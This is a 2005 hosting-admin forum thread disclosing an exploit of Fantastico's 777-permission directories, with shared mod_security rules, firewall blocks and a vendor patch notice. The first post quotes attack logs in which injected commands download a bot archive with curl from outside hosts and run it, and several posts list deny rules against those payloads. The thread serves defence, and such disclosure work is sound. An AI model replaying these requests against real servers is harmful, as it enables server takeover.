The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Fantastico Issue - Improper chmod settings allows exploits to be ran - READ ASAP

Discussion in 'General Discussion' started by HostMerit, Oct 20, 2005.

  1. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Saw files running from /var/netenberg for the 2nd - 3rd time - Seems these dirs are 777 permissions, and people are starting to mass distribute scripts that take advantage of this overlook of security:


    Code:
    root@edge [~]# cd /proc/24106
    root@edge [/proc/24106]# ls -al
    total 0
    dr-x------    3 nobody   nobody          0 Oct 19 00:15 ./
    dr-xr-xr-x  206 root     root            0 Oct 14 12:50 ../
    dr-xr-xr-x    2 nobody   nobody          0 Oct 20 02:10 attr/
    -r--------    1 nobody   nobody          0 Oct 20 02:10 auxv
    -r--r--r--    1 nobody   nobody          0 Oct 20 01:54 cmdline
    lrwxrwxrwx    1 nobody   nobody          0 Oct 20 02:10 cwd -> /var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/
    -r--------    1 nobody   nobody          0 Oct 20 01:54 environ
    lrwxrwxrwx    1 nobody   nobody          0 Oct 20 02:00 exe -> /var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/httpd
    *
    dr-x------    2 nobody   nobody          0 Oct 19 00:15 fd/
    -r--------    1 nobody   nobody          0 Oct 20 02:10 ipaddr
    -r--r--r--    1 nobody   nobody          0 Oct 20 02:10 maps
    -rw-------    1 nobody   nobody          0 Oct 20 02:10 mem
    -r--r--r--    1 nobody   nobody          0 Oct 20 02:10 mounts
    -rw-r--r--    1 nobody   nobody          0 Oct 20 02:10 oom_adj
    -r--r--r--    1 nobody   nobody          0 Oct 20 02:10 oom_score
    lrwxrwxrwx    1 nobody   nobody          0 Oct 20 02:10 root -> //
    -r--r--r--    1 nobody   nobody          0 Oct 20 01:54 stat
    -r--r--r--    1 nobody   nobody          0 Oct 20 02:00 statm
    -r--r--r--    1 nobody   nobody          0 Oct 20 01:54 status
    dr-xr-xr-x    3 nobody   nobody          0 Oct 20 02:10 task/
    
    root@edge [/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default]# cd /proc/3222
    root@edge [/proc/3222]# ls -al
    total 0
    dr-x------    3 nobody   nobody          0 Oct 18 18:00 ./
    dr-xr-xr-x  218 root     root            0 Oct 14 12:50 ../
    dr-xr-xr-x    2 nobody   nobody          0 Oct 20 02:11 attr/
    -r--------    1 nobody   nobody          0 Oct 20 02:11 auxv
    -r--r--r--    1 nobody   nobody          0 Oct 20 01:54 cmdline
    lrwxrwxrwx    1 nobody   nobody          0 Oct 20 02:11 cwd -> /var/netenberg/fantastico_de_luxe/master_files/Drupal/files/irclordz/
    -r--------    1 nobody   nobody          0 Oct 20 01:54 environ
    lrwxrwxrwx    1 nobody   nobody          0 Oct 20 02:00 exe -> /var/netenberg/fantastico_de_luxe/master_files/Drupal/files/irclordz/eggdrop-1.6.12*
    dr-x------    2 nobody   nobody          0 Oct 18 18:00 fd/
    -r--------    1 nobody   nobody          0 Oct 20 02:11 ipaddr
    -r--r--r--    1 nobody   nobody          0 Oct 20 02:11 maps
    -rw-------    1 nobody   nobody          0 Oct 20 02:11 mem
    -r--r--r--    1 nobody   nobody          0 Oct 20 02:11 mounts
    -rw-r--r--    1 nobody   nobody          0 Oct 20 02:11 oom_adj
    -r--r--r--    1 nobody   nobody          0 Oct 20 02:11 oom_score
    lrwxrwxrwx    1 nobody   nobody          0 Oct 20 02:11 root -> //
    -r--r--r--    1 nobody   nobody          0 Oct 20 01:54 stat
    -r--r--r--    1 nobody   nobody          0 Oct 20 02:00 statm
    -r--r--r--    1 nobody   nobody          0 Oct 20 01:54 status
    dr-xr-xr-x    3 nobody   nobody          0 Oct 20 02:11 task/
    root@edge [/proc/3222]# cd /var/netenberg/fantastico_de_luxe/
    

    It appears all of these are exploitable.



    I finally traced back to the exploitable script being used to mass distribute this, exploitable help center files (Installed by Fantastico also)


    Code:
    root@edge [/usr/local/apache/domlogs]# grep "neten" xxxxxxx
    200.158.9.221 - - [19/Oct/2005:00:06:47 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/Drupal/files/irclordz/filesys/;ls%20-la HTTP/1.0" 200 2427 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:07:07 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/Drupal/files/irclordz/;ls%20-la HTTP/1.0" 200 5726 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:07:30 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/Drupal/files/.var;ls%20-la HTTP/1.0" 200 3494 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:09:52 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/;ls%20-la HTTP/1.0" 200 3399 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:10:09 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/;mkdir%20.www HTTP/1.0" 200 2236 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:11:05 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;curl%20-O%20http://www.liquidhost.biz/call/.doc/bot.tar HTTP/1.1" 200 2809 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:11:36 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;tar%20-xf%20bot.tar;rm%20bot.tar HTTP/1.1" 200 2255 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:11:47 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;ls%20-la HTTP/1.0" 200 3287 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:14:27 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;curl%20-O%20http://www.anc01.oi.com.br/mh HTTP/1.0" 200 2553 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:14:36 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;./httpd%20-b%20mh HTTP/1.0" 200 2695 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:40:43 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;ls%20-la HTTP/1.0" 200 3532 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:40:49 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;mkdir%20.ani HTTP/1.0" 200 2236 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    
    I would suggest if you have not yet, please install mod_security, this is now available to be done from WHM, or you can visit http://www.nuclearelephant.com/projects/mod_evasive/

    This is ESSENTIAL to any server, you can find a ruleset at www.gotroot.com or email me at kris@hostmerit.com for my ruleset I've developed over the last year or so

    Below are the rulesets I've developed to keep our servers secure from this security overlook, APPLY THESE MOD SECURITY RULES IMMEDIATELY.

    SecFilter "arta\.zip"
    SecFilter "cmd=cd\x20/var"
    SecFilter "master_files"
    SecFilter "HCL_path"
    SecFilter "clamav-partial"
    SecFilter "vi\.recover"
    SecFilter "netenberg"
    SecFilter "pipe.php"
    SecFilter "cse.gif"
    SecFilter "psybnc"
    SecFilter "fantastico_de_luxe"

    Also,

    apf -d vesgo.50megs.com
    apf -d 64.136.24.0/24

    I have no possible need to have packets incoming from insecure webspace, hence I've blocked the c-block it came from.


    One more thing, chances are you're already infected, multiple times.

    I would kill the /var/netenberg directory and do a fresh install.
    You can also check by cd /var/netenberg then find ./ -user nobody, then remove any scripts owned / modified by nobody, as all real scripts have root permissions.

    Right after, do:
    Code:
    chattr +i -R /var/netenberg/
    

    If anyone tried installing these scripts when they were hacked / had rogue files inside them(which is a very very good chance), you just helped your client autoinstall exploit script...

    It appears Netenberg has known about this, yet is slacking on fixing it.

    Judging as you can now run files / compile / etc - If any people have unpatched kernels, there is a possibility of being rooted from this... I think it was necessary to disclose how to fix / patch this. No hate against Netenberg or Fantastico, but you must keep your server secure, I suggest you apply the above SecFilter into your mod security configuration ASAP.

    -Kris

    http://www.hostmerit.com

    kris@hostmerit.com
     
  2. Izzee

    Izzee Well-Known Member

    Joined:
    Feb 6, 2004
    Messages:
    469
    Likes Received:
    0
    Trophy Points:
    16
    Thanks for the heads up on this one. You have been very thorough in your efforts at securing these issues.
    My servers all checked out just fine and so I have instigated your recommendations and hopefully should be secure once again, till the next hole is discovered. :rolleyes:
    The link to Got Root site has one of the best collection of modsec signature files I have ever seen. I bookmarked for a closer look later.
    Well done! :)
     
    #2 Izzee, Oct 20, 2005
    Last edited: Oct 20, 2005
  3. DigiCrime

    DigiCrime Well-Known Member

    Joined:
    Nov 27, 2002
    Messages:
    399
    Likes Received:
    0
    Trophy Points:
    16
    Have you emailed Kosmo or left a message on their board about it ?
     
  4. elitewebninja

    elitewebninja Active Member

    Joined:
    Jan 2, 2004
    Messages:
    43
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    Atlanta Ga!
  5. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    They've known for a few weeks, but haven't done anything

    They asked for 'a few more releases to fix it'

    Which I didnt seem fit

    If anyone would like MY ruleset

    It is at http://www.hostmerit.com/modsec.user.conf

    This is assuming you used CPanel / WHM Addon Modules to install Mod_sec

    This would go in /usr/local/apache/conf/
     
  6. jackie46

    jackie46 BANNED

    Joined:
    Jul 25, 2005
    Messages:
    537
    Likes Received:
    0
    Trophy Points:
    0
    Hi thanks for that;

    Just a quick parusal and i notice these two rules duplicated.

    SecFilterSelective THE_REQUEST "&highlight=%2527%252E "
    SecFilterSelective THE_REQUEST "changedir=%2Ftmp%2F.php "
     
  7. dalem

    dalem Well-Known Member
    PartnerNOC

    Joined:
    Oct 24, 2003
    Messages:
    2,577
    Likes Received:
    40
    Trophy Points:
    48
    Location:
    SLC
    cPanel Access Level:
    DataCenter Provider
    HostMerit great post

    and great link to www.gotroot.com
    I implimented the ruleset from there found that the blacklist.conf & blacklist2.conf were little to restrictive
     
  8. Izzee

    Izzee Well-Known Member

    Joined:
    Feb 6, 2004
    Messages:
    469
    Likes Received:
    0
    Trophy Points:
    16
    Form a very recent post on the Netenberg forums by Kosmo:
    Virtuozzo powered VPS disallows the use of the chattr flag.
    How will these masterfiles on a Virt. VPS be protected I wonder?
     
  9. moogle

    moogle Well-Known Member

    Joined:
    Apr 7, 2003
    Messages:
    94
    Likes Received:
    0
    Trophy Points:
    6
    Will disabling or removing helpcenter resolve the issue?
    I found mine in Gallery and Zen Cart.
     
  10. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Any script can be exploited or installed into, its the 777 permissions set by Fantastico on it.

    Using my new rules + other rules will block this rubbish. My ruleset has been compiled by me over the last 6+ months, with some default, some from GotRoot, and some I've found myself to work well since I've implemented it. My ruleset should not be restrictive as it has special rules from Gotroot also to allow programs that call commands in a vunerable way pass through, without disabling the security module.

    I've found you cant nearly load all of GotRoot's scripts, but alot are good for a Cpanel enviroment, I also used to work security for a rather large web hosting company, so I know how these people think.
     
  11. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Although not a cPanel issue, I've made this sticky for now until netenberg release a fix.
     
  12. jackie46

    jackie46 BANNED

    Joined:
    Jul 25, 2005
    Messages:
    537
    Likes Received:
    0
    Trophy Points:
    0

    Well i had to use HostMerit's ruleset as i was having Apache restart issues with the Apache 1.x ruleset's. The ruleset i was having an issue with is

    rules.conf
    blacklist.conf

    Apache 1.x does not like something in that ruleset and i didnt botther checking any futher.
     
  13. kosmo

    kosmo Well-Known Member

    Joined:
    Aug 12, 2001
    Messages:
    403
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    All over Europe
    to all:

    Please update to Fantastico 2.10.0 r15 asap.

    kosmo
     
  14. chae

    chae Well-Known Member

    Joined:
    Apr 19, 2003
    Messages:
    145
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Auckland, New Zealand
    Thank You Kosmo
     
  15. mambovince

    mambovince Well-Known Member

    Joined:
    Jan 15, 2005
    Messages:
    192
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    London, UK
    Any news on this?
    Can I use the WHM to update Fantastico on a Vituozo VPS server?

    Thanks,

    - Vince
     
  16. kosmo

    kosmo Well-Known Member

    Joined:
    Aug 12, 2001
    Messages:
    403
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    All over Europe
    I am afraid it will not work on VPS and you have to wait for our final solution which will be here in some days. I suggest to protect your server using mod_security as suggested earlier in this thread.

    kosmo
     
  17. jackie46

    jackie46 BANNED

    Joined:
    Jul 25, 2005
    Messages:
    537
    Likes Received:
    0
    Trophy Points:
    0
    I will wait with this update too. I dont trust that this update will not screw up something!
     
  18. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Once you add / install mod_security / those rules, I'd suggest you try

    http://www.yourdomain.com/?netenberg (Such as http://hostmerit.com/?netenberg)

    If you get a 403 Forbidden error, Mod_security is working. If not, I would try installing from WHM if you dont know how to install from http://www.modsecurity.org/

    Also, you can feel free to email me / have me take a look.

    Hope this helps some people, as I know someone whos box was compromised due to this problem. He needed a total restore, I'm hoping you guys dont :)

    Good luck,
     
  19. jackie46

    jackie46 BANNED

    Joined:
    Jul 25, 2005
    Messages:
    537
    Likes Received:
    0
    Trophy Points:
    0
    All 10 of my boxes were clean before adding your rules and all of them run Fantastico and phpsexuec. Not sure if running phpsuexec has stopped anyone from trying a Fantastico expoloit or not, And thanks for the rules. Looking though my logs i have more people trying to compromise the box via awstats than any other.
     
  20. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    That's another thing I would add

    SecFilterSelective THE_REQUEST "awstats.pl?configdir"
    SecFilterSelective REQUEST_URI "awstats\.pl\?configdir=\|"
    SecFilterSelective REQUEST_URI "awstats\.pl\?update=1\&logfile=\|"
    SecFilterSelective REQUEST_URI "awstats\.pl\?pluginmode=\:system\("
    SecFilterSelective REQUEST_URI "awstats\.pl\?(configdir|update|pluginmode)=echo"
    SecFilterSelective REQUEST_URI "/awstats\.pl\?[^\r\n]*logfile=\|"
    SecFilter "awstats"


    This is an older exploit and CPanel should only be accessing AWStats, apache shouldnt.

    These rules are already in my mod_sec file, so it should already be blocking them.
     
Loading...

Share This Page